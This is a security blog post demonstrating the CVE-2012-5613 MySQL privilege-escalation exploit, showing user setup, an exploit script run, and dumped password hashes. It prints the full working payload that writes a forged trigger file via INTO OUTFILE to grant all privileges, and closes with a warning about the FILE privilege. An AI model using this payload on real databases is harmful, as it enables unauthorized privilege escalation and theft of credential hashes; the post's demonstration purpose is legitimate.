The MySQL Month

The month is not over yet,  but with the end of the world approaching, we may safely say that this month is the month of MySQL bugs (or features).

Kingcope published seven MySQL vulnerabilities in the first weekend of the December, which made quite the buzz in the security community.

In this post we will demonstrate the CVE-2012-5613 exploit. The exploit needs an unprivileged MySQL user with FILE privileges. We will test against localhost, but it does work equally well, if run against a remote server.

First, we will create the user, the table and grant the necessary privileges:

~# mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> CREATE USER 'test'@'localhost' IDENTIFIED BY 'test';
Query OK, 0 rows affected (0.00 sec)

mysql> create database testdb;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON testdb.* TO 'test'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)

mysql> GRANT FILE ON *.* TO 'test'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)

mysql> Bye

We test if the user can dump the hashes of the mysql users:

~# mysql -utest -ptest
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select * from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'test'@'localhost' for table 'user'
mysql> Bye

Finally, we run the script:

~# perl mysql.pl 
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/testdb/rootme.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\', max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE User=\\\'test\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';DBD::mysql::db do failed: Unknown table 'rootme' at mysql.pl line 136.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql.pl line 142.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql.pl line 151.
W00TW00T!
Found a row: id = root, name = *9CFBBC772F3F6C106020035386DA5BBBF1249A11
Found a row: id = root, name = *9CFBBC772F3F6C106020035386DA5BBBF1249A11
Found a row: id = root, name = *9CFBBC772F3F6C106020035386DA5BBBF1249A11
Found a row: id = debian-sys-maint, name = *BDA9386EE35F7F326239844C185B01E3912749BF
Found a row: id = test, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = rootedbox2, name = *2E336F463947F204B63500637846D6AC2A4D26BA
Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7

Now, many are saying that the FILE privilege should not be granted lightly….and they are correct. Rarely, you will see servers, on which regular users have the FILE privilege. This does not make all the published exploits any less cooler :-). And, hopefully, some administrators will understand that the FILE privilege allows limited users to create and load triggers that can be used to elevate their privileges.

The post The MySQL Month appeared first on Web Security Watch.